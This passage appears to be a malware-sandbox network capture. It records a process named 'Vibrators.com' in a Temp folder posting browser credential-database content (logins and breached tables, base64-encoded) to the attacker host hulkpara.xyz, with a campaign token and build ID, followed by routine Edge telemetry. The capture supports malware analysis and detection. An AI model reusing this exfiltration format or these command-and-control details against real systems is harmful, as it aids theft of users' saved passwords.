2024-12-18 20:09:32 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:34 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:09:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.9	49809	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:34 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----3W47QQ9ZUA1V3EC2NYMO User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 68733 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:09:34 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 33 57 34 37 51 51 39 5a 55 41 31 56 33 45 43 32 4e 59 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 33 57 34 37 51 51 39 5a 55 41 31 56 33 45 43 32 4e 59 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 33 57 34 37 51 51 39 5a 55 41 31 56 33 45 43 32 4e 59 4d 4f 0d 0a 43 6f 6e 74 Data Ascii: ------3W47QQ9ZUA1V3EC2NYMOContent-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------3W47QQ9ZUA1V3EC2NYMOContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------3W47QQ9ZUA1V3EC2NYMOCont
2024-12-18 20:09:34 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:34 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
2024-12-18 20:09:34 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:34 UTC	3313	OUT	Data Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31 Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
2024-12-18 20:09:36 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:09:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-18 20:09:36 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.9	49815	94.130.191.168	443	7852	C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:36 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KXBASJECBA1VAA1VKF37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: hulkpara.xyz Content-Length: 262605 Connection: Keep-Alive Cache-Control: no-cache
2024-12-18 20:09:36 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 58 42 41 53 4a 45 43 42 41 31 56 41 41 31 56 4b 46 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 61 31 36 30 65 62 33 65 61 31 31 66 65 32 65 36 38 34 31 38 31 33 62 39 33 63 37 39 38 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 58 42 41 53 4a 45 43 42 41 31 56 41 41 31 56 4b 46 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4b 58 42 41 53 4a 45 43 42 41 31 56 41 41 31 56 4b 46 33 37 0d 0a 43 6f 6e 74 Data Ascii: ------KXBASJECBA1VAA1VKF37Content-Disposition: form-data; name="token"7fa160eb3ea11fe2e6841813b93c798d------KXBASJECBA1VAA1VKF37Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------KXBASJECBA1VAA1VKF37Cont
2024-12-18 20:09:36 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:36 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:36 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:36 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:36 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:36 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:36 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:36 UTC	16355	OUT	Data Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
2024-12-18 20:09:36 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-18 20:09:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 18 Dec 2024 20:09:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.9	49792	18.165.220.57	443	4108	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 20:09:37 UTC	925	OUT	GET /b?rn=1734552576462&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=37276334F0DB6278260F766DF1DC6332&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
